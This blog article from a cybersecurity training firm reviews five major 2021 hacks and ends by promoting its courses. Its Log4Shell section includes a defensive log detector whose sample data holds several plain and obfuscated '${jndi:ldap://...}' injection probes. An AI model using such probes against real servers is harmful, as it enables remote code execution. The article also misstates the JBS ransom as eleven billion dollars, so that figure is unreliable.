Biggest Hacks of 2021

In 2021 hackers successfully executed thousands of hacks.  The biggest hacks made worldwide headlines and caused severe disruptions, from triggering a gasoline supply panic to exposing critical vulnerabilities in the world’s foremost technology providers.

According to the Identity Theft Research Center (ITRC), the number of data breaches has increased by 17% since 2020.  IBM reported that the average cost of a data breach is now over four million dollars.  Cyber-insurance payments are also on the rise: 2021 broke records with the largest cyber-insurance payout to date, six million dollars.

These trends indicate that hackers are becoming more sophisticated, bolder, and more skilled.  Unfortunately, hackers are showing no signs of slowing down, which is why organizations are desperate for trained cybersecurity professionals.

Here are 2021’s biggest hacks based on their financial, reputational, or privacy impact. 

5. JBS

The JBS hack demonstrated that hackers are willing to target any type of industry.  Hackers will go after any organization where they can find and exploit a weakness and make some money, usually through ransomware.

JBS is one of the world’s largest meat packing companies.  It maintains meat packing facilities on most continents.

On May 30, 2021, JBS was targeted by a ransomware attack which led to the shutdown of 14 meat processing facilities across the U.S.

According to the FBI, the Russian-based ransomware gang known as REvil was responsible for the attack.  REvil has been responsible for other high-profile ransomware attacks in the past, including the Quanta hack targeting Apple.  REvil is a highly sophisticated hacking group that operates like a mature business: it has an HR department, an operations policy, and quarterly goals.

This group was able to steal more than five terabytes of information over two months.  It then installed ransomware on critical systems linked to meat distribution, which completely shut down fourteen meat processing plants.

The loss of revenue and supply chain disruptions from the shutdown of these facilities were catastrophic for the company.  JBS responded by paying the requested ransom of eleven billion dollars in Bitcoin to the hackers.  The CEO of JBS said, “…we felt this decision had to be made to prevent any potential risk for our customers.”

4. Colonial Pipeline

Most people never directly experience the effects of a hack.  Sure, they read about them in the news, but those hackers never affect them, right?  Well, the Colonial Pipeline hack directly affected millions of people along the U.S. East Coast with gas shortages and price spikes.

Colonial Pipeline is responsible for 45% of all gasoline, diesel, and jet fuel along the East Coast of the U.S.  The company runs thousands of miles of pipeline carrying these fuels to major refineries and fueling stations.  Hundreds of gas stations on the East Coast rely on Colonial Pipeline for day-to-day operations.

Colonial Pipeline was targeted by a cyberattack on April 29, 2021.  Hackers used a compromised password to log in to Colonial Pipeline’s network directly through a VPN.

Ransomware was installed on the systems used to control fuel distribution across the East Coast.  Ransomware works by encrypting data using strong encryption algorithms, which makes it nearly impossible for victims to access their own data without the decryption key.  Hackers then demand a ransom, usually in the form of cryptocurrency, in exchange for decrypting the data.

The hackers notified Colonial Pipeline that their systems were compromised on May 7th, after they had downloaded several gigabytes of data.

DarkSide, an Eastern European hacking group, was responsible for the attack.  It is believed that DarkSide obtained a valid but unused password from a list of leaked passwords on the dark web.  The group demanded 4.4 million dollars in Bitcoin as ransom.

The hackers not only encrypted the data but also threatened to release sensitive information, a technique known as double extortion.

Colonial Pipeline paid the ransom to avoid shutdown of their operations and massive fuel shortages.  Paying the ransom is usually the last resort for extorted companies because there is no guarantee that hackers will unlock the files they have encrypted. 

Within a few months, the U.S. Justice Department was able to recover all of the Bitcoin paid to the hackers, though the value of that Bitcoin had dropped to 2.6 million dollars at the time of recovery.

3. Microsoft Exchange Server

One of the most damaging hacks of 2021 was the widespread compromise of Microsoft Exchange servers.  Chinese state-sponsored hacking groups chained four zero-day vulnerabilities, collectively known as ProxyLogon, to compromise Microsoft Exchange servers.

These vulnerabilities affected on-premises Exchange servers, those controlled locally by the organization.  The nature of the hack meant that Microsoft Office 365 Exchange servers were spared.

Hackers would scan the internet for Exchange servers and then use the ProxyLogon vulnerabilities to compromise them.  Anyone running an on-premises Exchange server was affected.  This included organizations from small businesses to large corporations.

The vulnerabilities allowed hackers to install a web shell on the Exchange server.  A web shell is a script placed on a web server that lets a remote user run commands on that server.  This meant that hackers were able to issue commands to compromised machines to steal data, install ransomware, or make the machines mine cryptocurrency.

Microsoft first became aware of the vulnerabilities in January and released emergency patches in March.  This meant that hackers were able to access information for months before the patch was even distributed, and it took many organizations even longer to apply it.  On top of that, the patch only prevented new compromises; it did nothing to remove attackers from machines that had already been compromised.

Microsoft and the U.S. Government both blame the Chinese state-sponsored hacking group Hafnium for the attack.  Hafnium is a well-known advanced persistent threat (APT) group with a reputation for targeting U.S.-based organizations.

2. Log4j

Java is one of the core technologies of the internet.  So, when a major hack involves Java, it is bound to have far-reaching consequences.

A zero-day vulnerability in the Log4j Java library is currently being actively exploited.  This vulnerability is known as Log4Shell and allows hackers to remotely execute code on machines running the Log4j library (a remote code execution (RCE) flaw).

The problem lies in Log4j, a ubiquitous open-source Apache logging framework that developers use to keep a record of activity within an application.

All an attacker has to do to exploit Log4Shell is send a malicious string to the target system.  That string gets logged by systems running Log4j version 2.0 or higher, and when the library processes it, it loads attacker-supplied Java code onto the system, which allows the attacker to take control.
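Because the trigger is a string that the application logs, a defender can look for it in the logs that were already written.  The following detector is an added example for this article, not code from Cyberkraft or from the Log4j project.  It assumes the well-known shape of the trigger, a `${jndi:` lookup, and that attackers disguise it with nested lookups such as `${lower:j}` or default-value syntax like `${::-j}`; the sample log lines and the `203.0.113.5` address are constructed for the example.

```python
import re

# Lookup forms used to disguise the literal "${jndi:" trigger (assumed from
# publicly documented variants). Each regex rewrites one lookup to the text
# it would resolve to, so nested obfuscation collapses innermost-first.
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")                    # ${x:-VALUE} -> VALUE
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)  # ${lower:X} -> X
_JNDI_TRIGGER = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse default-value and case lookups until the text stops changing.

    The round limit keeps a hostile line from driving the loop indefinitely.
    """
    for _ in range(max_rounds):
        collapsed = _DEFAULT_VALUE.sub(r"\1", text)
        collapsed = _CASE_LOOKUP.sub(r"\1", collapsed)
        if collapsed == text:
            break
        text = collapsed
    return text


def is_log4shell_probe(line: str) -> bool:
    """True when the line contains a JNDI lookup, plain or obfuscated."""
    return _JNDI_TRIGGER.search(normalize_lookups(line)) is not None


def scan_log(lines):
    """Return (line_number, line) for every line that carries a probe."""
    return [(i, line) for i, line in enumerate(lines, start=1) if is_log4shell_probe(line)]


# Constructed sample log: three benign lines and four probe variants.
SAMPLE_LOG = [
    '2021-12-10T12:00:01Z GET /index.html 200 "Mozilla/5.0"',
    '2021-12-10T12:00:02Z GET /login 200 "${jndi:ldap://203.0.113.5/a}"',
    '2021-12-10T12:00:03Z GET /api 200 "${${lower:j}ndi:ldap://203.0.113.5/a}"',
    '2021-12-10T12:00:04Z GET /api 200 "${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.5/a}"',
    '2021-12-10T12:00:05Z GET /search?q=${env:HOME:-/root} 200 "curl/7.79"',
    '2021-12-10T12:00:06Z GET / 200 "${${env:NOEXIST:-j}ndi:rmi://203.0.113.5/a}"',
    '2021-12-10T12:00:07Z GET /health 200 "kube-probe/1.22"',
]


if __name__ == "__main__":
    for number, line in scan_log(SAMPLE_LOG):
        print(f"line {number}: possible Log4Shell probe: {line}")
```

Matching the normalized string rather than the raw one is what catches the disguised forms; a detector that only greps for the literal `${jndi:` misses three of the four probes in the sample.  Finding probes in a log shows that the server was targeted, not that exploitation succeeded, and the detector is a compensating control while the affected Log4j versions are upgraded, not a substitute for the upgrade.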

Java libraries are often used by web applications and enterprise systems.  The popular game Minecraft relies on Java libraries and has been severely affected by the Log4Shell vulnerability.  Microsoft, which owns Minecraft, developed patches to fix the vulnerability shortly after its discovery. 

Hackers are rushing to exploit this vulnerability, and it is currently being exploited by botnets.  The Mirai botnet, which has been used in the past in conjunction with other high-profile attacks, is known to be actively exploiting Log4Shell.

This vulnerability is widespread and easy for hackers to exploit.  These factors combined make it very dangerous for organizations with less robust security teams.  Some organizations may not realize they are affected for several months, or may lack the resources to resolve the vulnerability once it is discovered.

1. SolarWinds

The SolarWinds hack showed us what happens when a popular security tool becomes the target of a hack.  Organizations trust security tools to keep their environments safe from hackers.  It can be a shock when the tool designed to protect you is the very thing hackers are using to steal your data.

SolarWinds, a company that sells IT monitoring and management tools, was targeted by a Russian hacker group called Nobelium in 2019.  Nobelium compromised the SolarWinds Orion platform, which provides an all-in-one solution for network monitoring, security management, and IT operations.

The SolarWinds Orion platform was compromised by an attack known as Sunburst.  Nobelium was able to introduce a malicious dynamic-link library (DLL) into the Orion platform.  The DLL was inserted during the software development process, went undetected by SolarWinds, was incorporated into the platform, and was signed as valid code.

This meant that SolarWinds customers received legitimate-looking software updates from SolarWinds that included the malicious code known as Sunburst.  Up to 18,000 customers used Orion, including:
– Microsoft
– Cisco
– Deloitte
– State, local, and federal government agencies
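The point a practitioner should take from Sunburst is that a valid code signature proves who signed an artifact, not that the artifact is what the source code says it should be: the implant was already inside the build when the signing step ran.  The following Python block is an added example for this article, not code from SolarWinds or from any vendor; it models the signing step with an HMAC as a labelled stand-in for the vendor’s real code-signing key, uses constructed byte strings for the clean build, the tampered build and the independent rebuild, and shows why comparing an update against an independently rebuilt artifact (a reproducible-build check) catches what signature verification alone cannot.

```python
import hashlib
import hmac

# Constructed artifacts. CLEAN_BUILD is what the source revision compiles to;
# TAMPERED_BUILD is the same output with an implant added inside the build
# pipeline, before signing; INDEPENDENT_REBUILD is a second party's build of
# the same source revision on infrastructure the attacker never touched.
CLEAN_BUILD = b"Orion.dll (constructed) -- compiled from tagged source revision"
TAMPERED_BUILD = CLEAN_BUILD + b"\n[implant inserted in the build pipeline]"
INDEPENDENT_REBUILD = CLEAN_BUILD

# Stand-in for the vendor's code-signing key (constructed). A real signer uses
# an asymmetric key and a certificate chain; HMAC models the same property
# that matters here: the signature is valid for whatever bytes were signed.
VENDOR_SIGNING_KEY = b"constructed-vendor-signing-key"


def vendor_sign(artifact: bytes) -> bytes:
    """The signing step as it runs at the end of the vendor's pipeline."""
    return hmac.new(VENDOR_SIGNING_KEY, artifact, hashlib.sha256).digest()


def signature_is_valid(artifact: bytes, signature: bytes) -> bool:
    """What a customer's installer checks before accepting an update."""
    return hmac.compare_digest(vendor_sign(artifact), signature)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def matches_independent_build(artifact: bytes, rebuilt: bytes) -> bool:
    """Reproducible-build check: the shipped bytes must hash identically to
    an independent rebuild of the same source revision."""
    return hmac.compare_digest(sha256_hex(artifact), sha256_hex(rebuilt))


def assess_update(artifact: bytes, signature: bytes, rebuilt: bytes) -> dict:
    """Run both checks and say whether the update should be trusted."""
    sig_ok = signature_is_valid(artifact, signature)
    build_ok = matches_independent_build(artifact, rebuilt)
    return {
        "signature_valid": sig_ok,
        "matches_independent_build": build_ok,
        "trusted": sig_ok and build_ok,
    }


if __name__ == "__main__":
    # The pipeline signs whatever it produced, so the implanted build gets a
    # perfectly valid vendor signature.
    tampered_signature = vendor_sign(TAMPERED_BUILD)
    print("tampered update:", assess_update(TAMPERED_BUILD, tampered_signature, INDEPENDENT_REBUILD))
    print("clean update:   ", assess_update(CLEAN_BUILD, vendor_sign(CLEAN_BUILD), INDEPENDENT_REBUILD))
```

The signature check passes for both builds, and only the comparison against the independent rebuild separates them.  That is the defensive lesson of Sunburst: customers and vendors need an integrity check whose trust root lies outside the build pipeline, whether a reproducible build, a second build environment, or published hashes produced off the pipeline, because the signing key alone cannot tell a clean build from a compromised one.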

Timeline of Events

The Sunburst code remained undetected for more than a year, so it can be confusing to keep track of when each major event occurred.  Here’s a timeline of the major events:
– September 2019: Nobelium gains unauthorized access to the SolarWinds network
– October 2019: Threat actors test an initial code injection into Orion
– February 20, 2020: Malicious code known as Sunburst is injected into Orion
– March 26, 2020: SolarWinds unknowingly starts sending out Orion software updates containing the hacked code
– December 16, 2020: The Sunburst attack is discovered by FireEye

FireEye, a cybersecurity firm, discovered the malware in December of 2020, over one year after hackers compromised Orion.  This means that Nobelium had a working backdoor into any organization using the Orion platform for more than a year.

Some companies still use versions of SolarWinds Orion with the Sunburst backdoor.  The full extent of the SolarWinds hack is still unknown.

The Need for Experienced Professionals

One thing all of these hacks have in common is that they demonstrate how much work it takes to protect against hacking attempts.  Organizations need the right tools and, more importantly, the right people to keep their data secure.

That’s why trained cybersecurity professionals are needed to protect against these hacking attempts.  Organizations can barely keep up with hacking attempts using the current cyber workforce.  This has led to a near-zero percent unemployment rate in the cybersecurity industry in 2021.  This huge demand for certified professionals is expected to continue in 2022, making now the perfect time to earn a new professional certification.

Whether you are an experienced cybersecurity professional or just getting into the field, Cyberkraft has training options to fit your career.  Check out our live training bootcamps or self-paced courses to jumpstart your career with a new certification.